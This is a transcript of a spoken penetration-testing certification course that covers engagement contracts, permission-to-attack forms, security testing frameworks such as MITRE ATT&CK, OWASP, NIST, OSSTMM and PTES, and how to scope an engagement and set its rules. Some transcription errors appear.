Really, it's just a you might hear it as confidentiality, right? We are protecting the privacy of our clients' sensitive information, their proprietary information, even, right? So this will be the PII, the people of the organization that we are contracted for, as well as any research and development or intellectual properties, right? We do not want to expose these things, and we will be contractually obligated to not expose these things unless certain conditions have been met. Right? So there will be times when you can disclose. So usually the NDAs are one thing saying, do not talk about X, Y, and Z. These are the things that you cannot discuss, you cannot disclose, you cannot public. If you do, you have a mad rat cat. It's kind of a legal situation for us, right? The very fact is, if we have an NDA and then I go and talk about this stuff, well, Daniel now has the ability to come back to me and legally say, you violated our non-disclosure agreement, and here's what you're liable for as well. So making sure that we understand that process is actually a big part of what we have to ensure that we do. Yeah, and what's interesting, again, kind of oddly, it goes the other way as well, right? We have NDAs as testers to say, you as our client are getting kind of backstage access to proprietary procedures, maybe tools that we develop. You cannot release that information out as well. That's how we make our money. And it would be very difficult for us to recover from that because once the genie's out of the bottle, per se, right? It's really hard to put it back in. That information has become public now. You've taken away my ability to have a competitive edge in my market. So those NDAs, honestly, a lot of times go both ways. So make sure that you understand that, and it's a legal documentation that binds those parties to each other on what they can and cannot disclose.
All right, so our next particular topic here is going to be statement of work. Now, Daniel, that sounds very familiar, very much like the idea of the SLA. Is it the same thing?
It's very close, right? They have a lot of similarities. And again, you'll see a lot of similarities and overlap in these documents. We'll get to that again with another document. It's not the same thing. There are some minor differentiations on like the minutia that goes in that. So statement of work, or SAL, right, is a highly detailed document that explains specific things like the work that's to be performed. Is it going to be a vulnerability assessment? Will there be remediations that are involved? Right? Very interesting. Again, just putting this in, sometimes you get to look at this part of the statement.
So a lot of times when we start seeing that statement of work, we might also do something which I think we have to talk over with companies. Let's say, Daniel, you run that penetration test, and you realize here's SLA to do that. But you can also subcontract out that particular amount of work in that one situation and say, here's the duty that I need you to make sure that you're defined, and here's the scope of the work that you're given to do. And so we're performing that for us, which we're also, of course, we're now performing for that company. So having that broken out really does help to show the detail that's involved. We're also going to have liability covered in that sense. That they don't do that statement, then we have an issue.
Right. This is a cover your butt document in a lot of ways, right? This is what we agreed to do, and you signed the document that said that that's what we agreed to do. You're asking me to do something more than that. Well, that's not in the contract, brother, or as it may be, and we need to renegotiate if that is going to be the case. A few more details on what just make sure you're understanding what kind of goes into that. Billing might also be in here. Time frames typically are in statement of work. This is how much work I'm going to be doing. This is how I'm going to be doing it. This is how much it's going to cost me. Caveats, disclaimers, you need to put in there. So don't work on this, or want to do that out of scope. You want to use this, not that kind of stuff. So what happens is downtime due to uncontrollable factors that you have to define. It's not really a fun procedure, and this is why typically you'll have a legal team that kind of works this information for you based off of your, the specifics of your organization and the company. You also want to put those deliverables in there. Here's what I promise to give to you at the end of this engagement, and then all the parties must sign off on this. Right? Everybody's got to put the John Hancock on there and make sure that okay, we agree. Once that happens, you put that into effect. Again, I do have a example for us to take a look at. Now, I found one in this project info docs. All links will be in the show notes for you to learn materials. And I love how the statement of work is a very powerful project and will put a bit of time in creating a detailed cell will help to ensure that work is being performed according to your specifications and expectations. Such a big deal. And that's why this is an important document for everybody. Yeah, but definitely you can download. Just want to make that available for you folks. If you want to really kind of dig your teeth into this to really understand this aspect, it would behoove you. Let me tell you what, if you put on a resume that I have in some way, shape, or form experience with scoping and documentation that goes behind working with clients, that is going to give you a competitive edge in the marketplace. So very important things that if you learn will give you that little step above your competitors.
Now, speaking of another particular document that we have to kind of jump into, SLA, statement of work. You said there's another one that's coming up that we have to kind of go. It kind of overlaps again. Master service agreement. So service level agreement, master service level, agreement.
You're starting to see the problem. You're probably going. These all kind of seem very similar, but again, it kind of is like this top-down approach. And I just took the documents as they were given from the CompTIA, right, for the objectives. But it could have been reordered. Honestly, MSAs are kind of the overarching. This is what we've agreed to do, right? Again, can involve things that we've looked at in both the SLAs and the statement of works. All that information could be in your master service agreement. A lot of times you'll see that those items get pushed off into their own set of documentation for specific minutiae reasons. But an MSA could be the document that you use for all of these things. So then that's the idea, right? This is the master service agreement. So when we do that, they got the general set of terms and definitions that are agreed upon by both signatories. That's my little working definition of this right here. All right, this saves us time for future work, right? Because everything's in one big document. It would dissuade a lot of times from making changes to the document because then that's a large overarching document that you have to step to modify. And the inertia of that can really keep people from going, both clients and testing companies both want to have their cake and eat it too in a lot of ways. And this helps everybody be fair to just have one large master service agreement. So what else do we need to know about this? Terms using MSA can be referenced by subsequent documentation. So it might just be that more overarching, and then as you dip into statement of works and SLAs, information that you need to understand those documents could be found in the MSA, and that's what we typically can use MSA for if we are pushing those documents onto their own thing. Other things, common MSA terms, payment terms, delivery requirements, IP rights, what goes in there, warranties, limitations, disputes of resolution. Yeah, well, how do we fix a problem? Confidentiality, always the most documents, love setup, and work standards. I do have a couple of examples to take a look at. Got this one here, Blink Digital Security Master Penetration Testing Services Agreements. So this is a very, as you can see, it's templated on, entered into the DD day of MM month and YYY years between XYZ Security LLC, the consultant, and the customer name. So you can see that legalese is there, giving you some recitals, scope of services, price of payment terms, right, terms and termination, term and termination. So when does it start, when does it end, ownership of intellectual property, yeah, all that lovely stuff that we were just talking about. Here's another one I found, Master Service Agreement. Important to carefully go through this. This is not as nice. There's some definitions, right? As we just talked about, what's applicable law, confidential information, all that stuff is being defined and laid forth right here at the beginning of the engagement. And then these are going to give you the sections in which we find more information about that. So we've broken this out into multiple documents, or it's a different section of the MSA. You know exactly where to go.
Starting route to Mass General.
So if you're creating your own, you definitely want to take some help.
Yeah, by using that master service level agreement, it goes and allows our company to define some of these different things that we already are going to be working as we do agreement and statements of work. That way, we know that there's a standard definition for it. If instead of Daniel, you having 6 contracts and all of a sudden it's like, well, I didn't think that's what that meant. You always can refer back and say, no, in our masters, service agreement, this is exactly how it's defined. You have it referred, you signed it, you've agreed to it, and it really does help to make sure that we can reuse that. That way, we have to really type everything out in super detail again. So along with that, we have our last definition here.
Probably our most fun, right?
Probably the most fun. Permission to attack. Is that a real document?
That is a real document, and you really better get one. Because if you don't, then you don't actually have permission. A handshake and a word over a bar napkin is not going to cut the mustard when it comes to what you're going to be engaging in. So make sure this document is done, is signed, sealed, and delivered, because it is super important.
Stop this. So let me stop. Let me pause video.
There are tyrants. Bear with me. That you might actually get caught doing some of these things, and it might be perceived as you are attacking someone. And the legal authorities are going to want to know what's up with that, right? So the one thing we want in our pocket, and has been signed by all the correct people, is going to be that what we commonly refer to as a get-out-of-jail-free card, right? Or permission to attack, which is a more legal term for that. Well, I think we do see get-out-of-jail as a very common, even inside the legal documentation still, references as a get-out-of-jail-free card. So really fun stuff. I love the terminology, and that's so much fun. So this is going to mean that we need to obtain a signature from the proper signing authority, third-party authorization when necessary. So if you're like pen testing in the cloud, right? Great. Ronnie's got his systems on the cloud where his Active Directory lives. I'm going to pen test that. Guess what? I got to get permission from his cloud provider to do that because he doesn't own the metal that those systems are running on. So there are contacts within each of the cloud providers for doing this thing. It's not like they're like, what, people want to pen test into our system? I'm not. That's not going to happen. All the big dogs out there know that this is something that you should be doing, and they're going to help you do that. But you got to be aware that they're a third-party provider. You need to get their permission as well. So if you accidentally do something or get caught doing something, they go, oh no, they are an authorized tester. They were testing against Ronnie's systems, and yeah, that's not fun. Okay. A couple other things. Common elements of these authorization forms are going to be proper authority defined, authorized tester defined. So I'm defined as a tester, Ronnie's defined as a tester, but you're not. And we say, hey, person watching this episode, don't know your name, but I'm glad you joined us. Did you run an nmap scan for me? And you do it. That was unauthorized. That's not good. We violated things, and you could be in trouble, right? So let's keep that in mind. What systems we're going to be testing? What systems we're not going to be testing? We're going to be on that authorized time period for when we can actually test. So these are going to be computer network systems, going to be cloud systems. There's going to be physical infrastructure. We do a team, physical test against their organization. Could be if I'm breaking into buildings, things can get hairy and dicey. Which brings me to my last example, which is if you haven't been familiarized with the Darknet Diaries, by all means, please check them out. It's a great podcast talking about security. This one right here, the courthouse, had me thinking I was taking crazy pills. It's all about true pen testers, red teamers from a company called Coalfire, and how they were pen testers. They had documentation even, but there were some weird legal things that didn't get properly vetted out, and they almost went to jail over this. So very interesting. If you want a really great, spend about an hour and a half of your time, it's like 85 minutes. Totally worth the investment. Very interesting story. It's I highly recommend that. But this is the ramifications of what can happen if you don't have the proper documentation for attacking an organization. To say, hey, I'm an authorized pen tester. I'm doing this for them, not against them. So keep that in mind. Check that out. It's pretty interesting and entertaining.
All right, Daniel, thank you again for actually helping us understand more about these different concepts as well as documents that are actually available to us. There are a lot of points, so let's make sure we review them right now. So we do have, of course, that service level agreement, as well as the NDA, the SOW, the MSA, and permission to attack. All these are, of course, different concepts that we're going to, of course, need to be familiar with. Even as a pen tester, there is legality on you, and you have to say, hey, look, I need to learn a little bit more about it. You can't just plead ignorance when it comes down to this. So make sure you take the time to study for those too. All right, well, that'll do it for our episode. And you notice that we're having fun. We hope you're having fun as well. But that means more fun is coming in a couple of episodes.
What's going on?
Penetration testing. That's right. We are ready to jump in and take a look at some other details that we really need to dive into it again. The idea here of standards and methodologies. Now, because we're talking about penetration testing, Daniel, a lot of times someone that's brand new that says, just let me get to it, let me do it. And what we tend to see, especially at the beginning, is that it seems like they do some of the right things, but then it's like, why did they miss this? Why did they miss that? And so we might actually go to help them out with this episode.
Yeah, absolutely. This is going to give you some guidance because, like Ronnie says, a lot of times people will get so excited about, oh, we're going to go in here and hack some stuff and ain't that fun. And we know what you're right. It's a good time. At least have that pen tester. It might bring some tears to the eyes of the blue teamers out there and your seals going, oh no, we're holding secure. But thank goodness you came in and those hacky things and found that out for us. But I like how you put it on. You can shoot from the hip. And it's kind of a spray and pray. If you've got no real methodology that you're following, things can be overlooked, or it might not really be relevant to your clients, right? So what do we do? Well, good news is we're not left without witness. We've got a few standards and frameworks, methodologies, things that we can use as a checklist, a guideline to what should we be doing, and maybe even be following some form of regulation because it might require that you do it this way. So if we're not familiar with those things, we're not going to be able to do that. So I'm going to give you some helpful frameworks, standards, methodologies, whatever you like to call them, that you'll need to be familiar with for the exam, but are actually used by pen testers in the real world.
All right, so we've got several that we're going to be talking about in this episode, Daniel, but also help us to actually figure out as a pen tester why these things are also going to, or why that particular standard is actually going to be necessary. So let's take a look at the idea of a MITRE attack, or what is that pronounced right?
Yeah, MITRE attack, right? So it's spelled oddly, ATT_CK, and this is from the MITRE organization. I have it pulled up on my computer here, so we want to take a look at that. They look very orange and white website. It's an interesting color choice that they've used here, but let's get beyond the aesthetics here, right? What we really want is, what is this thing? And it says that MITRE attack is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. So a lot of security professionals and organizations have got together and said, here's what we see in real life. These are the attacks that we get lobbed against X, Y, and Z industries that have actually happened. Here's what we did to mitigate it. Here's what we did when we investigated it. Here are the details that we found out about it, and they started to collate that, put it all together in one big form that they now publish on the web called ATT&CK, right? The attack or attack, right? The attack knowledge base is used on a foundation for the development of specific threat models. So this is all about threat emulation. So what basically this is for is so that if you were, maybe you ran an airline industry, okay? There are specific threats that target airline industries, right? Wouldn't it be great if you could figure out what is the common ways in which which my type of organization is attacked, and then we can try to build defenses against said attacks.
Yeah.
Seems like a pretty useful tool, right?
Yeah, that actually would be very helpful to be having some guidance there and understanding where the basis of this comes from. If it's actually based off this, it's actually from real world observations that were made, and we can probably be able to generalize at least some of that methodologies to defend against those using this.
Exactly. See, Ryan gets it. He understands. Hopefully you do as well. The fact that I see, oh, well, a typical adversary will use X, Y, or Z tactic during reconnaissance. They'll use X, Y, or Z tactic during the attack phase, right? Going kind of through the attack phases that are typical, right? Well, let me build a defense system to specifically look for those things. Now, we're kind of talking blue team right now so far. But what's cool is once you put those defenses in place, how well do they work? Or are we going to wait for us to be actually attacked? Well, that's one way to go about it. Not a huge fan of that that idea. What we should do is get some penetration testers in the game and have them come and do some threat emulation, right? Pretend that you are some sort of ATP that would come against our organization, our industry, and do it in this way, because this is the most common way in which we see that in this field, right? Yeah, that's what we do. We bring the two things together. We see those pen testers can, how effective they were at getting past the defenses, and how good the defenses were that we put in place, detecting, stopping, all the wonderful things we like to do.
Yeah, I like this idea because it can really help that particular pen tester to be very focused in, especially we want to make sure that we defend against the most common ones instead of having to open the entirety of Pandora's box and try to figure out everything, which eventually, of course, you'll want to do. But you're saying right now, this is what I need. Right. You can go through and ensure by actually saying, here's the focus I need to focus.
Absolutely. Let's take a little closer because we want to look at the description and talk about what it is. Let's see a little bit more of the detail of how this actually looks. So let's jump back in here, and if I scroll down just a little bit, you'll see I've got this really dynamic system, right? You can start clicking on these things. You'll notice that they're underneath these different topic headings, right? Like reconnaissance, or these are tactics, I guess they call them. So reconnaissance, you've got resource development, initial access. So kind of walking you through each developmental phase of getting to the end result, which is complete system compromise, control, and I think over here at the very end we have command control, exfiltration, and then whatever the impact might eventually be to our organization. And then there are things underneath that. So if we go to initial access, we have a drive-by compromise. This is a little bit small. I'm gonna make it really big for us here because you can always scroll over. So we have drive-by compromise. You can click on these links and they'll take you to what a drive-by compromise is, and it all is collated and structured so that you can move your way through this really easily. So it's a really good resource for that specific purpose. Now, as a pen tester, I can then take those methodologies and implement them. You also have the company Red Canary. They created a set of scripts that will kind of walk through all those attack framework attacks, and you can automate that and get a really quick vulnerability assessment that simulates a penetration test. So really cool. I put this link in our learner resources so that if you wanted to give this a shot, you could download this. It doesn't actually, I don't think it requires any installation. Maybe some requirements there is maybe if it's Python or whatever, but it's a pretty straightforward thing. Shows you how to get started, great wiki. So if you wanted to try this on some of your own systems, you absolutely could. Another resource for you. So there you go. That's what was meant to do, kind of the nuts and bolts around how that works. And then the Red Canary, this is called the Atomic Red Team scripts. Check those out. Really cool stuff.
All right, the next one that I want to take a look at is OWASP. I've heard the OWASP top 10, but this is something a little bit different, isn't it?
Yes, we have OWASP, which is the Open Web Application Security. Oh, I always forget the P. I'm horrible at this. It's not protocol. It's there's the Ryan's going to get that. But what we do have is OWASP project. Thank you. Project is such a weird thing for me. Yeah. Anyway, what we need to know about OWASP is they're a great resource for us as penetration testers. They're always kind of like what MITRE was doing as far as like bringing in what are the common tactics and vulnerabilities, weaknesses that we see in things like web applications and things like mobile devices and things like even like I think they have IoT and OT, or at least IoT. I think they have that specifically. But they try to bring in a lot of really good resources. Not only that, but they give you testing guidelines. So if you wanted to check your security, you absolutely could. I've got a link for you here, and it shows us this is the testing guides that they have available. Here are the latest, and they have them labeled. WSTG is one of the latest ones. But OWASP has its own testing guides, right? The OWASP testing guides, which is the web security testing guide, mobile security testing guide, firmware security testing methodologies, right? You also have the penetration. We're going to get to the standards. They're kind of listing other standards, some of them which we're going to talk about. But as far as OWASP is concerned, you have a great resource in them with their own testing guides. So you click on the testing guides area, and you can then start to go, I want to do web security testing guides. So maybe a web application, I want to test against that. I've never really done that before. I know how to do some web application testing. Maybe I know the process scripting or CSRF or things like that. But how do I methodically and what's a good methodology for what I should be looking for and how I should be looking for to verify that I did everything I need to look for, and that when I'm done with my assessment, it was thorough. Right, so there you go. You got testing guides to help you out with that. Giving you all the wonderful information you need on doing that. I'm not going to read through this for you. You can check it out. Just kind of scrolling and see if there's interesting things right here right out of the gate. Spotlight on the card game. So check that out. Really good stuff there. OWASP. Not only that, but their top 10 lists are phenomenal. They give you great information. So as a pen tester, you can kind of use that and glean to learn more. Like what's common, what should I be trying to do. Great stuff from OWASP.
Yeah, because that's an open type of community project that's actually out there, which professionals are contributing and learning about it. We also have the idea of even being able to go to a government agency to help us out here. So we want to talk about the NIST, and just as you can run a project, I can know what NIST stands for.
So it's the National Institute of Standards and Technologies.
Yeah, that sounds right to me.
Yeah, sure. Why not go with that? Sounds good. So there you go. That's them. But they've been around a hot minute. Our U.S. government's kind of issuing their standards for security and compliance. And anything to do with technology, honestly, is going to be their wheelhouse when it comes to our government. But a lot of private organizations utilize their documents as well and their standards and their frameworks, specifically the SP 800-whatever series, which really are focused in on security and what we can do to make them secure. And now we also have things that can help us test that security, which is what we're all about. It's all about doing security assessments. So we got a couple SP 800 documents for us. One of them is the SP 800-53R5, which is revision 5, right? Which is security and privacy controls for information security systems. What we're really interested in here, not necessarily a specific pen testing document per se, but does have some information in it that is specific to this. What I'm looking for is, I'll just do a control F up here. I'm looking for penetration. Fine. And then I think the next one may be helpful. Here we go. CA-8 penetration testing, and they're talking about this as a security control, which I say it is. So conduct penetration testing, right, on whatever the organization is. So on. Talks about discussion, what that means, what that looks like. Again, giving us more information about it. Control enhancements. We have employing independent agent or team to perform testing, and what that means. If there's any related controls, you can check those out. Click that, go to that. So CA-2 would be a related control. Click that link. Taking that relevant information. We also have retaining exercises. Very, obviously that's the peak of the mountain for us doing those really cool APT style assessments. And goes into those details there in the discussion. Then we got one more here, which is facility penetration testing, physical pen testing. What does it look like? What are the constraints? How should we look at that? How does NIST define that? Now that is all well and good. We also have the special publication 800-115, which is the technical guide to information testing and assessment. I'll give you 3 guesses on what this is all about from top to bottom. Assessments and guidelines that they would want you to follow if you were using this document. So really good stuff in this.
All right, now there's actually some other ones that we're going to talk about here, and I'm not familiar with these at all. The Open Source Security Testing Methodology Manual. I call it
Awesome.
Awesome.
It's awesome. Yeah. That's a heck of an acronym they got there, which is not awesome. Because acronym guy, I am not really great at these, and I just go, oh, this is my nightmare. Comes through them. It's like what do they call those? Ben Noir. Right. That's what's happening. But I say that their acronym is kind of horrible. That said, their testing guide is really, really helpful because it's going to give you those guidelines, and it's not going to lay down the procedures specifically like, oh, use this tool and use it this way to accomplish X, Y, or Z goal. But it's more of a, here are some of the phases you should be going through. Here's some guidelines, and be looking for these types of things. Right? It's more general than it is specific, but it is super helpful. So if you're really good at doing X, Y, or Z things, you just need to know what order you should do them, or don't forget to do those things. Right? The OSSTMM is going to be helpful. So I've got version 3 available for us here, and it's got a lovely hummingbird on the front. And you'll start to see that kind of thing through there when you look at where's the table of contents. Almost there. Boom, project. They love to pat themselves on the back first. There we go. Table of context, and you can start to see introduction, purpose, and chapter 1. What do you need to know? Right? Security, controls, information assurance, objectives, limitations. Right? Not talking about things we've been talking about in this domain. Getting into that area, and that's beginning the first steps you take. Cool. It helps helps me not overlook those things and gives me guidance on doing them correctly. That's a good document. It's going to be helpful, right? What do I need to know in chapter 2? Defining a security test. Continue on. We're going to talk about scoping and other things like rules of engagement in subsequent episodes from here. So really moving us along. So you're starting to see how this lines up with PenTest Plus. Now you can really use the two things. What you're learning in this series is going to align very closely with what you're seeing in this document, and you can start to marry the two things together, what you know versus how you should do it. It's going to be super helpful.
All right, now, along with that, you and I were talking before the show, and there's another one called the PTES, which seems to be very helpful if you're really beginning as well to try and do something in pen testing.
Yes, this is the penetration testing execution standard. Go ahead and get that acronym out of the way. But Ronnie and I said, Ronnie, you gotta check this thing out.
Yeah, that's amazing.
This is a kind of the opposite of what we just saw with Awesome, right? It is very technical. It does drill down to tool level and use of tool level. Very helpful. Honestly, like if you were someone that has small, medium-sized business and you wanted to perform your own security assessment, you probably follow this guide word for word and come out with a pretty decent test. This is a very useful resource. So I highly recommend checking it out. I got the main page up, so take a look at that. And obviously, they used some wiki software to build this thing. I know it's kind of small, but what you really want to do is check out the technical guideline. Interesting stuff that goes here in the technical guidelines because you start to see tools required, radio frequency tools, intelligence gathering, right? These are the hacking phases and showing you tools and techniques for each one of those phases. So if you, this is free, by the way. This is an incredible guide. I would have this printed out and stuck on my desk, which will be done by the end of this day, right? Because this is a great resource, giving you so much detail on the who, what, when, where, how, and why of what's going on in a pen test.
Yeah, even if I weren't a pen tester, but somebody, a pen tester came in and said, here's what I'm going to do, I think I could come in here, look it up, and begin to understand the tools that they're using and procedures going on.
Absolutely. And maybe some of the tools will be a little more advanced, and will be a little more difficult, but with some gumption and the right attitude, you could really do some damage with this thing and start to understand. This is a great resource for anybody trying to get into penetration testing and hacking. It's phenomenal because it's going to take all those things you read in different books about hacking tools, methodologies, and really give you some substance and guidance with how you should use that. So great stuff there. Just check that out.
All right, our last particular standard that we're actually going to take, actually a framework here, Information Security Assessment Framework. I don't know how you pronounce this.
Yeah,
ISAF?
Yeah, ISAF. Who knows?
Yeah.
Okay, so it's in the PenTest Plus objective list. They call this out specifically. I went to looking for it. I'd heard of it before. I never really drilled down on it because I just haven't had a need for that. Here I am today with a need for it because it's called out, and I want to make sure that you are equipped to go to that testing booth and go, I know what ISAF is because Daniel talked about it with Ronnie on ITProTV, right? So we'll leave no stone unturned here. But they definitely didn't save the best for last. I say it's really old. I can't find anything that's currently updated. Went straight to their website, which is the OISSG. This is the Open Information Systems Security Group, who develops this Information Systems Security Assessment Framework. You'll notice this is draft 021, date April 30th, 2006. This is the most recent document I can find on this. Does that mean it is completely useless? No, it does not. Right? There still has some good guidance and things that never really change and therefore are still relevant. But maybe some of the details and minutia could be outdated. I didn't pick it, right? So don't blame this guy, right? But it doesn't mean you won't run across it or that you might not want to take a look at it and see what it does have to offer. So I got the link for you there as well if you want to take a look over this thing. You can see it does have some interesting things like password security testing, switch security testing, router security testing, firewall security, right? Intrusion detection systems. So there are commonly used systems in this, even though it's an older document. To what extent you're going to be successful with their methodologies or capabilities, tools, and techniques that they give you, that remains to be seen because technology has kind of advanced a bit since then, even though we still have these things back in 2006. So there you go. You might as well when it comes to this one, but they call it out, so I'll make sure I mention it here for you.
All right, well, that's plenty of different types of standards and frameworks and different guidance that we can actually use. So a lot in this episode, but let's go ahead and make sure we get the key points here. Don't forget, we went over the idea of MITRE ATT&CK and OWASP, NIST, and OSTEM, as well as PTES and also ISAF. We start talking about all these different ones that are actually out there. Now, some of them, like Daniel said, there's a knowledge here, but they are all documents that you might find on the PenTest Plus exam, so you want to make sure that you review those before you go in. Well, there's plenty more awesome CompTIA pen test shows to come, so make sure you stay tuned for the very next. Projects can get out of hand. That's right, you are joining me and, of course, Mr. Daniel Lowry as we continue on in PenTest Plus. We've got scoping and engagement now, and this is not about a pre-wedding thing that we're doing here, but we're actually talking about penetration testing, and the very fact is that when it comes down to it, we now have an engagement and we're called to do our job, but why the heck do we need to start with scope?
Well, it's a great question, and something that can be easily overlooked, so we like to bring some focus in on what scoping is and why it's important to Ronnie's point. So we're going to take some time to look through that today, and what are the elements that would go into a scope documents? How do we put that in? What are some of the common themes that we see through there? And maybe even what that looks like. I got a few examples for us to take a look at so that we can have some hands-on, for all intents and purposes, of what a scope might entail. So let's dive in and dig in, shall we?
All right, so as we begin, we want to talk about an ROE. What does that actually stand for and why do we care?
Oh man, the ROE.
Fish eggs.
I was about to say,
Yeah.
this is fish, right?
Yeah.
Baby's a little,
Caviar.
yeah, some caviar, that'd be nice. Was that black sturgeon? Ooh,
Very fancy.
But no, it's not that. Well, ROE stands for Rules of Engagement. A lot of times we put this into the scope documentation. Okay, and I wish we could start there, but neither of the examples I have actually have an ROE in them. Right? Which brings up a really good point, though, is you may or may not see ROE as part of the scope per se, maybe in NSA,
Okay, right.
somewhere in there, right? But the ROE is still an important piece of the puzzle because this is the what can I do, what can I not do. I say that, and there's other ways in which it may be interpreted, and we'll kind of get to those ways actually in this episode, so I'll call that out when we get there. But there's going to be things such as the time of day in which I might engage in my penetration testing activities. Because a lot of times the client will say, production day is from 6 a.m. to maybe 6 p.m. We really see high volume and utilization of our computer systems, and if penetration testing might cause problems during that time or a degradation of our service, yeah, we can have that. So we got to put in that you cannot pen test during 6 a.m. to 6 p.m. Okay, that's a rule of engagement, and that's a part of the overarching scope, right? Because that's what we're trying to do. Scope is to bring into focus certain specific things. What you can, where are the limitations, where are the boundaries? That's what scope is, right? So other things, type of allowed and disallowed tests. What can you do? What can't you do? Under what circumstances? And then other restrictions. Maybe they have very specific restrictions based off the industry. Right? I think of things like operational technologies, ICS, SCADA, medical, right? If you touch this machine, it can go bye-bye, and then people go bye-bye. So we don't want that. So very niche restrictions that might only be in their organization, their industry, that you couldn't generally apply across the board. So you got to be aware of those. Those are going to be in your ROE.
Yeah, I think that's very important because it's real easy to be a little bit over exuberant. I'm right here on the edge, but I just need this one additional piece of information, and you just go ahead and get it, and it now sends everything overboard here. So we want to be careful with that too.
Because we're going to talk about that in another
I wonder how that's going to happen here. Yeah. So we also need to talk about the idea of environmental scope as well, right?
Yes, absolutely. Environmental considerations are very important to the scope of the work because depending on what you're doing, that might change and dictate how your operations go, right? How the engagement is actually performed. So I'm thinking of things like, is it a network assessment? Is it a wireless assessment? Because those are related things, but not necessarily the same things. Does that make sense, right? So like all wireless would be network assessments, but not all network assessments are wireless assessments, right? Right? Your SAT questions that we love so much, right? That's what we want to see here. Is it an application that we're testing, right? Because if I'm testing an application, what I'm going to do is going to be completely different than if I were performing a wireless assessment. It's just a different animal. So the things that are going to go into those considerations need to be taken into account, and therefore then put into black and white inside that scope. All right, so here's the application that we're going to be testing, or applications. How much access do I have into it? Is it going to be a black box, a white box, gray box? How's that going to look? I don't know. That's where the scope comes in. You're going to define those things, put that in the document. Everybody get their little pen out and start signing away when we agree upon it at the end of the day. And then you as a pen tester are constrained by that document. So make sure, kind of like to Ronnie's point. Ooh, if I could just do this, I could get that information, and that would lead, I would easily own this thing. But it's outside the scope. We see this a lot in bug bounties. If you go to bug bounties like HackerOne or a bug crowd or whatnot, you'll see that when you look at the programs they have available, there is an area that's called the scope. This is what is in scope. This is what is out of scope. You'll notice that it's not just an in scope document. Everything is kind of like they define both what is in and what is out a lot of times. Right, so we see that there as well. What if it's a cloud assessment? Is your entire cloud environment up for grabs, or is it just specific areas of your cloud environment? And of course, you get a third-party agreement and all that good stuff we've already talked about. But the environment itself is very important, and it's going to play an effect and have an effect on the scoping of the engagement itself. So just keep that in mind.
Yeah, it's very easy, like we were talking about at the beginning, that if without a document like this or the idea of trying to scope this out, we might start that penetration test with the rules of engagement, but then we start realizing that we're going so far that all of a sudden we're outside of that rules of engagement at that point because of the time element or whatever else it may be. Yeah. So having something like this is really helpful to make sure that we're doing exactly what we need to do. Now, speaking of that, though, and you just mentioned here's something we don't get to touch, and here's something we do get to touch. With things like that also being included in the scope, which is here's a clear list of defined things of what we need to do.
Absolutely. And these are the things that are in scope, right? Are the what's the word for the target list? Yeah. Like these are the things we're going to go after. We're going to name them specifically, call them out. Right. Sometimes we call this the in-scope assets. Right. So we get to actually turn into our example forms now. Let's jump into my computer here. So I found this company Ambersale. They actually made available a scope template that you can utilize. It was specifically for a PCI DSS type of assessment, but it still is really useful and it could be cross-pollinated into some other type of test.
That's a good example.
Yeah, it's still a really good example because we have a lot of interesting information here, like the document reference, when the date of it is, there's giving some specifics around the document itself, which are all very important key pieces to creating documentation around engagement. Remember, all this stuff is legal, so we want to make sure that it is done well, and has all the pertinent information you're going to need, which this does have. Revision history, all great stuff, company names and page footers, headers, all the other wonderful stuff. But in here, we're going to see a lot of things like, especially under this number 4 area, procedure key stages before the test, what the basic setup is going to look like, right? During the test, monitor, testing traffic, what's going to be going on there, what's going to happen post-test. But in here, thing 4.2, selection of testers. These are going to be the testers. So if Ronnie's not in this list, he cannot test. Yeah, right? If I'm not on the list, I cannot test. Only the people named are authorized testers, right? And that's going to be a part of like doing this correctly. And then right underneath that, we start having identifying the test targets. Right to the heart of what we're talking about. What are these targets? What are these assets? Are they external? Are they internal? Right? Covering both of those. This is segmentation targets, right? And then establishing basic level testing. What tests are in scope and what tests are not in scope. So we see this here: information disclosure, authentication issues, buffer errors, cryptographic issues. These are that we're naming and defining exactly what we're going to be testing for, and that's going to be approval at the end of the day. Once that's approved, this is the document that guides us. If anything we do is outside this document, we violated, we have to do remediation. We have to say, oops, I made a boo-boo, right? I was like, I came to work today and decided I'm just going to do these wonderful cool tests I saw on the interwebs last night. And no, they're not in that document, but I mean, I figured it hurt, and then your production server went down. That's not bad, right? We want to avoid that. That's a bad idea, and it really speaks to the lack of integrity of us and our professionalism. We don't want to engage that. We stick to what we think we're going to be doing. If we need to adjust this document, there's possibility and probability for that. But until those changes have officially been made, do not step outside the boundaries of what you have put inside this document. It's a really good. I really enjoyed this document because it's a great job of defining all these different types of tests that you might be doing and showing how that looks inside of the scope document. So you'll notice there are many and sundry different tests that they could be performing, but not to be outdone or disclosed. SANS also has a document that I went out and grabbed. This is more, they call it scope worksheet. You'll notice there's some interesting, I love how that PDF thing keeps jumping in the middle of this. Maybe I can do this. I can't, so that's fine. There's some like questionnaire going on here. What are the target organization's biggest security concerns? So inside the scope, we're going to start to define it. A lot of times this is used to make a scope document. It might not be a scope document. So I'm questioning and figuring out from my customer what is it that they need based off of what they're concerned about. Right? They're going to give me that information, and then a little bit down the road here, it starts having an area where there you go. Penetration testing into targets, application level manipulation. Are we going to be doing client-side Java, activist, reverse engineering? How about physical penetration testing? Is that going to be a part of this? So this is more of a questionnaire to build the scope document. You start to see how the questions are designed to create the information that's going to go in the scope, and it's basically going to be pulled straight from here and put into something like we saw at Ambersale. So really great stuff. Two great resources for us to pull from. And again, it's going to be wireless networks. Are they in range? What are the IP ranges that you're going to give me? Let me document that. Put that. This is the scope. I can't go beyond these IPs. So what's in, what's out? What domains? APIs are always good ones. Physical locations, like we saw right here. Are we doing physical penetration tests? If so, what locations are going to go into that? Slap that in the old document. DNS information, external, internal targets, first and third party hosted, and this goes on. There's a lot going into the scope because we want to do a really good job defining it. But once you're done, you've got a really good roadmap to follow to make sure that what you're doing is what your client wants and it's going to be effective for the organization.
Now, with all that stuff, it's easy to get lost in the communication between the person that's doing the service and, of course, the company which wants the service as well. So how do we begin to do the validation of the scope?
So the validation of the scope is going to be pretty simple. Once the scope document has been created, we are going to kind of do another once over, right? We're going to look at what we've listed and we're going to verify with our clients that this is what they think it should be, right? Because ultimately, we're going to start with the questionnaire area, take that information we learned from the questionnaires, create a scope document, probably going to have some revisions because we're going to continually be asking our clients to validate that this is what they want under the guidance of us as the professionals, right? As far as penetration testing goes. So here's what we're going to try to guide you: is what we think that you need. Is this look okay? Or do you have any concerns? If you have concerns, we'll make some adjustments. We'll go back. But once we get to the end of the day, we're going to validate that this is what we have agreed upon, and then the Herbie Hancocks come out, right? Oh, no, it's Johnny.
Oh, yeah, Herbie's the singer.
That's right. But still, he's signed his name on your best, I'm sure.
Sure.
